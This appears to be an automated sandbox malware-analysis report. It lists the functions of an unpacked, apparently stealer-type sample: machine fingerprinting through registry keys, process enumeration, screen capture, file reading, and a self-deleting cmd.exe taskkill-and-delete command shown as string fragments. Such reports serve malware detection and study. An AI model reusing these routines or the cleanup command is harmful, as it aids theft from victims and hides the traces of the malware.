                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045C025
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000010), ref: 0045C058
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045C05F
                                                                                                                                            • _memset.LIBCMT ref: 0045C073
                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(00000000), ref: 0045C086
                                                                                                                                              • Part of subcall function 0045EF7B: __EH_prolog3_GS.LIBCMT ref: 0045EF85
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • GlobalMemoryStatus.KERNEL32 ref: 0045C0FF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: GlobalMemoryStatus_memmove$AddressH_prolog3H_prolog3_HandleModuleProc_memset
                                                                                                                                            • String ID: MB$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                            • API String ID: 59999723-2756951423
                                                                                                                                            • Opcode ID: 0b9363066a7cac814a202d1f0e473ce1bab1f46a7dd6500c078a472975ac3d6d
                                                                                                                                            • Instruction ID: 6dd26b646b429bf9f1f99e1fb4427ebb0a8d06e961078cf2f14a2b83387072f4
                                                                                                                                            • Opcode Fuzzy Hash: 0b9363066a7cac814a202d1f0e473ce1bab1f46a7dd6500c078a472975ac3d6d
                                                                                                                                            • Instruction Fuzzy Hash: 264142B1900248EFDB05EFA5CD45BDE77A8AB54705F10442FF906E3282DB789608CBA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045ED4F, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045ED59
                                                                                                                                            • GetCurrentProcessId.KERNEL32(000000CC,00408B06), ref: 0045ED66
                                                                                                                                              • Part of subcall function 0045E46A: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0045E495
                                                                                                                                              • Part of subcall function 0045E46A: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0045E4AF
                                                                                                                                              • Part of subcall function 0045E46A: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0045E4B5
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0045ED82
                                                                                                                                              • Part of subcall function 0045EC6D: __EH_prolog3_catch.LIBCMT ref: 0045EC8C
                                                                                                                                              • Part of subcall function 0045EC6D: _memset.LIBCMT ref: 0045ECBE
                                                                                                                                              • Part of subcall function 0045EC6D: OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 0045ECD0
                                                                                                                                              • Part of subcall function 0045EC6D: EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECE7
                                                                                                                                              • Part of subcall function 0045EC6D: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECFD
                                                                                                                                              • Part of subcall function 0045EC6D: CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 0045ED03
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 0045EE56
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileH_prolog3_H_prolog3_catchModulesShell_memmove_memset
                                                                                                                                            • String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe
                                                                                                                                            • API String ID: 1929281448-455057220
                                                                                                                                            • Opcode ID: 0b3e37342d2a31f0838f27fa25667a0670b3d5dafe7314731ec35e8ac48d1cb4
                                                                                                                                            • Instruction ID: 9f4d3939f4d0aa76950ba00cd786e0d3f759559c22e07c9c3b42b84d8591b8ef
                                                                                                                                            • Opcode Fuzzy Hash: 0b3e37342d2a31f0838f27fa25667a0670b3d5dafe7314731ec35e8ac48d1cb4
                                                                                                                                            • Instruction Fuzzy Hash: AE3141B1801218BACB55F7EACD99EDF7A6C9F15304F10446BF109B3092DA785B08CBB9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C879, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 307processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0045C883
                                                                                                                                              • Part of subcall function 0040E701: __EH_prolog3.LIBCMT ref: 0040E708
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00402CCF: _memmove.LIBCMT ref: 00402D20
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0045C91B
                                                                                                                                            • Process32First.KERNEL32 ref: 0045C92E
                                                                                                                                            • Process32Next.KERNEL32 ref: 0045C948
                                                                                                                                              • Part of subcall function 0040DCA9: __EH_prolog3_catch.LIBCMT ref: 0040DCB0
                                                                                                                                              • Part of subcall function 0045B704: __EH_prolog3_catch.LIBCMT ref: 0045B70B
                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000128,00000002,00000000,----------,0000000A,00000001,00000000,00000001,00000003,00000001,00481714,00000000,00000294,0040845B), ref: 0045CC2D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                            • String ID: ----------$----------
                                                                                                                                            • API String ID: 4185073159-2385812570
                                                                                                                                            • Opcode ID: 3896d17276c42defec7d2782c13cb15e80730f1bc21f30edd1e62ea0da2ee2ca
                                                                                                                                            • Instruction ID: d9970804887ed10d1254974e0977b92215d45a165387e07ef8bfa81efd045f7d
                                                                                                                                            • Opcode Fuzzy Hash: 3896d17276c42defec7d2782c13cb15e80730f1bc21f30edd1e62ea0da2ee2ca
                                                                                                                                            • Instruction Fuzzy Hash: D9B144B1804258AEDB15EB95DC96FEEB7BCAB15304F1400AFE405B3182EA785F48CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045EC6D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0045EC8C
                                                                                                                                            • _memset.LIBCMT ref: 0045ECBE
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 0045ECD0
                                                                                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECE7
                                                                                                                                            • GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECFD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 0045ED03
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$BaseCloseEnumH_prolog3_catchHandleModuleModulesNameOpen_memset
                                                                                                                                            • String ID: <unknown>
                                                                                                                                            • API String ID: 3374446145-1574992787
                                                                                                                                            • Opcode ID: d551a3c8cab47745d5b5621e89e7af427e5f656b92a1369938394432a03c7876
                                                                                                                                            • Instruction ID: 86e162e520629571d5ce56e695e7c8de764336974f5a4a2812e6d2a7bd1e5475
                                                                                                                                            • Opcode Fuzzy Hash: d551a3c8cab47745d5b5621e89e7af427e5f656b92a1369938394432a03c7876
                                                                                                                                            • Instruction Fuzzy Hash: E92153716002499FDB11DF55DD41BEE77A8EB08305F00403AEA08EB281E7759B088BA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045B894, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0045B8D6
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,00000001,00000000), ref: 0045B8F2
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?,?,00000001,00000000), ref: 0045B911
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000), ref: 0045B91A
                                                                                                                                            • CharToOemA.USER32 ref: 0045B92B
                                                                                                                                            Strings
                                                                                                                                            • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0045B8E8
                                                                                                                                            • ProcessorNameString, xrefs: 0045B909
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                            • API String ID: 2235053359-2804670039
                                                                                                                                            • Opcode ID: 12b4fb14c26ab94d698e92b9676f5cf4b45e7306dc8bb75416a1fdb0982de488
                                                                                                                                            • Instruction ID: 9f349a832ed6cfd361eb455036b8e2403641e9b274a419844f7df93375642d82
                                                                                                                                            • Opcode Fuzzy Hash: 12b4fb14c26ab94d698e92b9676f5cf4b45e7306dc8bb75416a1fdb0982de488
                                                                                                                                            • Instruction Fuzzy Hash: B4112EB154024CAFEB209FA4DC85AEE7BACEB18308F10403AE915D6151EA749E488B65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045B9DC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0045BA1E
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,004940CC,00000000), ref: 0045BA3A
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?,?,004940CC,00000000), ref: 0045BA59
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,004940CC,00000000), ref: 0045BA62
                                                                                                                                            • CharToOemA.USER32 ref: 0045BA73
                                                                                                                                            Strings
                                                                                                                                            • ProductName, xrefs: 0045BA51
                                                                                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0045BA30
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                            • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                            • API String ID: 2235053359-1787575317
                                                                                                                                            • Opcode ID: cac166b789b9b4df65acf9ee59bd3c477f3d338cdd0bfba32d451884e03b24c8
                                                                                                                                            • Instruction ID: 6b137712cdd0eb6bbef345bf285112697b7d42e4f642aaf790bc316dfede6ee0
                                                                                                                                            • Opcode Fuzzy Hash: cac166b789b9b4df65acf9ee59bd3c477f3d338cdd0bfba32d451884e03b24c8
                                                                                                                                            • Instruction Fuzzy Hash: 631130B150024CAFEB309FA4DC85FEE77BCEB14348F10403AE915D7151EA759E488B65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045BB5B, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0045BB9D
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,00000000,00000000), ref: 0045BBB9
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,00000000,00000000), ref: 0045BBD8
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 0045BBE1
                                                                                                                                            • CharToOemA.USER32 ref: 0045BBF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                            • API String ID: 2235053359-1211650757
                                                                                                                                            • Opcode ID: 36ab69400dc38073753757aa9e4282a07fc7a224cea277e0c0d247d8129e78da
                                                                                                                                            • Instruction ID: 5aca61bb8e375ecd33f19efad7d063771580e9a17e0ac2d61e8ba75a53987af9
                                                                                                                                            • Opcode Fuzzy Hash: 36ab69400dc38073753757aa9e4282a07fc7a224cea277e0c0d247d8129e78da
                                                                                                                                            • Instruction Fuzzy Hash: 841130B150024DAFEB309FA4DC85FEE77BCEB14308F10403AE915D7151DA759E488B64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041044C, Relevance: 10.6, APIs: 7, Instructions: 137stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041046B
                                                                                                                                            • _memset.LIBCMT ref: 00410495
                                                                                                                                              • Part of subcall function 0045D0A6: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040C6DE,?,0000001A), ref: 0045D0C0
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 004104B6
                                                                                                                                            • _memset.LIBCMT ref: 004104C1
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 004104D4
                                                                                                                                            • lstrcatA.KERNEL32(?,00481844,?,?,?,?,?,00000014), ref: 004104E2
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 004104F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcat$_memset$FolderH_prolog3Path
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1637166636-0
                                                                                                                                            • Opcode ID: de6c8a60195abc1e1cc1c2e7220e59265264d3bd33a56911a80ff7f956a6ef99
                                                                                                                                            • Instruction ID: 2ba29e3c98573e7963a1eb0b952be7266e42071cc0e9cbac55c557cc964f08c0
                                                                                                                                            • Opcode Fuzzy Hash: de6c8a60195abc1e1cc1c2e7220e59265264d3bd33a56911a80ff7f956a6ef99
                                                                                                                                            • Instruction Fuzzy Hash: CA510E7290014DABDB10EF95DC85EDE7BBCEB08304F50412BF905A7191EB79A748CBA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CF86, Relevance: 10.5, APIs: 7, Instructions: 46windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0045CF90
                                                                                                                                            • GetDC.USER32(00000000), ref: 0045CFA6
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000), ref: 0045CFA9
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0045CFB5
                                                                                                                                            • GetDC.USER32(00000000), ref: 0045CFC7
                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0045CFD5
                                                                                                                                              • Part of subcall function 0045CF28: GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 0045CF65
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0045CFEB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompatibleCreateObject$BitmapDeleteFileGdipImageSaveSelect
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 927946569-0
                                                                                                                                            • Opcode ID: 302ac1cad6894642668075d4237eeefbdce71bf5bb87a232bddc89ee3ea05c7c
                                                                                                                                            • Instruction ID: 3a31f31d46c3f34e6a6e962774047457edc7f65689b407f7c9ecf91e2f727e98
                                                                                                                                            • Opcode Fuzzy Hash: 302ac1cad6894642668075d4237eeefbdce71bf5bb87a232bddc89ee3ea05c7c
                                                                                                                                            • Instruction Fuzzy Hash: D301E47A400248BFCF125FA1EC49CAF3F7DFB89654B000429FA0991222D6328965EB75
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00464B51, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 00464B6B
                                                                                                                                              • Part of subcall function 0046632E: __FF_MSGBANNER.LIBCMT ref: 00466347
                                                                                                                                              • Part of subcall function 0046632E: __NMSG_WRITE.LIBCMT ref: 0046634E
                                                                                                                                              • Part of subcall function 0046632E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004644D0,00000001,00000000,?,?,?,0046452E,004026BA), ref: 00466373
                                                                                                                                            • std::exception::exception.LIBCMT ref: 00464BA0
                                                                                                                                            • std::exception::exception.LIBCMT ref: 00464BBA
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00464BCB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                            • String ID: P&@$bad allocation
                                                                                                                                            • API String ID: 615853336-4206170211
                                                                                                                                            • Opcode ID: f779c9376c82ea9d9fe59336d9ca83f1bde870639c0810606b0884cc439f8bc9
                                                                                                                                            • Instruction ID: 0ed21ac70ac814b8c77b513c2ff3c77b00c643ac6c8ac7ab6299b13ad57f8842
                                                                                                                                            • Opcode Fuzzy Hash: f779c9376c82ea9d9fe59336d9ca83f1bde870639c0810606b0884cc439f8bc9
                                                                                                                                            • Instruction Fuzzy Hash: 22F0F431910209AACF04FB56DC06BAE3FA9AB90758F54446FE800921E1EBBCDE45C75E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040B614, Relevance: 9.1, APIs: 6, Instructions: 62filememoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040B62C
                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040B643
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040B65F
                                                                                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040B679
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040B68F
                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0040B69A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1815715184-0
                                                                                                                                            • Opcode ID: a81af9797827676432a67855654e521ac7a46788b1acaa5267d905d00724a992
                                                                                                                                            • Instruction ID: 81995bb7fdee330cd178c1640a64a8ba0b494ec04cef74a6200b518a2932d2fe
                                                                                                                                            • Opcode Fuzzy Hash: a81af9797827676432a67855654e521ac7a46788b1acaa5267d905d00724a992
                                                                                                                                            • Instruction Fuzzy Hash: 72113D71500205EFDF109FA4DC88EAABB7CFB04314F24493AF955E2290D7369D54CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004270B4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$FileRead_memset
                                                                                                                                            • String ID: winRead
                                                                                                                                            • API String ID: 1942371898-2759563040
                                                                                                                                            • Opcode ID: e059d22cdf266f3c8ae673f6a51b198ca5c5a9b1c28137b9a40a83d4efeea55d
                                                                                                                                            • Instruction ID: a041336923cfa0d60b7ef9226323bdb97b7f01c3d97cfd35c18a9beae69d1294
                                                                                                                                            • Opcode Fuzzy Hash: e059d22cdf266f3c8ae673f6a51b198ca5c5a9b1c28137b9a40a83d4efeea55d
                                                                                                                                            • Instruction Fuzzy Hash: 0F318D72A042299BDF00DF69EC819AF3BB5EF44314F54402AFD00DB241E734EE618B99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045EB38, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0045EB3F
                                                                                                                                            • Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,?,?,?,00000038,004041B5,?,00000010), ref: 0045EB87
                                                                                                                                            • __time64.LIBCMT ref: 0045EB8F
                                                                                                                                              • Part of subcall function 0046572C: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00465737
                                                                                                                                              • Part of subcall function 0046572C: __aulldiv.LIBCMT ref: 00465757
                                                                                                                                              • Part of subcall function 0045CDE5: _malloc.LIBCMT ref: 0045CDED
                                                                                                                                              • Part of subcall function 0045CDE5: GetTickCount.KERNEL32 ref: 0045CDF8
                                                                                                                                              • Part of subcall function 0045CDE5: _rand.LIBCMT ref: 0045CE0D
                                                                                                                                              • Part of subcall function 0045CDE5: _sprintf.LIBCMT ref: 0045CE20
                                                                                                                                              • Part of subcall function 00468168: __getptd.LIBCMT ref: 0046816D
                                                                                                                                            • _rand.LIBCMT ref: 0045EBBC
                                                                                                                                              • Part of subcall function 0046817A: __getptd.LIBCMT ref: 0046817A
                                                                                                                                              • Part of subcall function 0045D13F: std::_Xinvalid_argument.LIBCPMT ref: 0045D14D
                                                                                                                                            Strings
                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 0045EB5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time__getptd_rand$CountFileH_prolog3_catch_SleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                            • API String ID: 503986416-374730529
                                                                                                                                            • Opcode ID: e7e8785a5f7d8b23595c0d5a3cad223969dd4420569766e02697b7a96472804d
                                                                                                                                            • Instruction ID: 899f5578e6c625a550c782dd2f89e27131ed230c212186b1e82bbad9f7239330
                                                                                                                                            • Opcode Fuzzy Hash: e7e8785a5f7d8b23595c0d5a3cad223969dd4420569766e02697b7a96472804d
                                                                                                                                            • Instruction Fuzzy Hash: 4621C071900304AFEB14EBA6DC86BADB7B4BF50716F10402FF141AA1C2DBB85A09CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CFF8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0045D01B
                                                                                                                                            • GetSystemMetrics.USER32 ref: 0045D027
                                                                                                                                            • GetSystemMetrics.USER32 ref: 0045D02E
                                                                                                                                              • Part of subcall function 0045CF86: CreateCompatibleDC.GDI32(00000000), ref: 0045CF90
                                                                                                                                              • Part of subcall function 0045CF86: GetDC.USER32(00000000), ref: 0045CFA6
                                                                                                                                              • Part of subcall function 0045CF86: CreateCompatibleBitmap.GDI32(00000000), ref: 0045CFA9
                                                                                                                                              • Part of subcall function 0045CF86: SelectObject.GDI32(?,00000000), ref: 0045CFB5
                                                                                                                                              • Part of subcall function 0045CF86: GetDC.USER32(00000000), ref: 0045CFC7
                                                                                                                                              • Part of subcall function 0045CF86: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0045CFD5
                                                                                                                                              • Part of subcall function 0045CF86: DeleteObject.GDI32(00000000), ref: 0045CFEB
                                                                                                                                            • GdiplusShutdown.GDIPLUS(?), ref: 0045D046
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompatibleCreateGdiplusMetricsObjectSystem$BitmapDeleteSelectShutdownStartup
                                                                                                                                            • String ID: screenshot.jpg
                                                                                                                                            • API String ID: 3709458919-673422685
                                                                                                                                            • Opcode ID: fd14669707731ad20b121da98b3be51a4499330e5af7b56748e8ab306fef0f1d
                                                                                                                                            • Instruction ID: c1996325a0b389877d1706a851a1e02087f35b2648d83e2c975c73c1b539b7e9
                                                                                                                                            • Opcode Fuzzy Hash: fd14669707731ad20b121da98b3be51a4499330e5af7b56748e8ab306fef0f1d
                                                                                                                                            • Instruction Fuzzy Hash: 60F030B6C00208BACB01AFA68D45DEFBFBCEB80714F00009BEA04A2142D7755645DBE5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046109A, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004610EE
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00461128
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CreatePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2024441833-0
                                                                                                                                            • Opcode ID: fae15f4de6fd7a11d8f4be524d9421b05b4a9f4b6fde33eef0eb82a394ddef2b
                                                                                                                                            • Instruction ID: 1725cd2df56436e4633969966d49e9f81ffedcc677aa6721cb8a0329fb1de0a4
                                                                                                                                            • Opcode Fuzzy Hash: fae15f4de6fd7a11d8f4be524d9421b05b4a9f4b6fde33eef0eb82a394ddef2b
                                                                                                                                            • Instruction Fuzzy Hash: 2E3165B0504785DFD7308F258C84AA777E8E71A354F148A3FF256867A0E3789C84CB5A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042EEF0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 208fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0042EF39
                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000003,00000000,?,?,00000000), ref: 0042F020
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile_memset
                                                                                                                                            • String ID: psow$winOpen
                                                                                                                                            • API String ID: 3830271748-4101858489
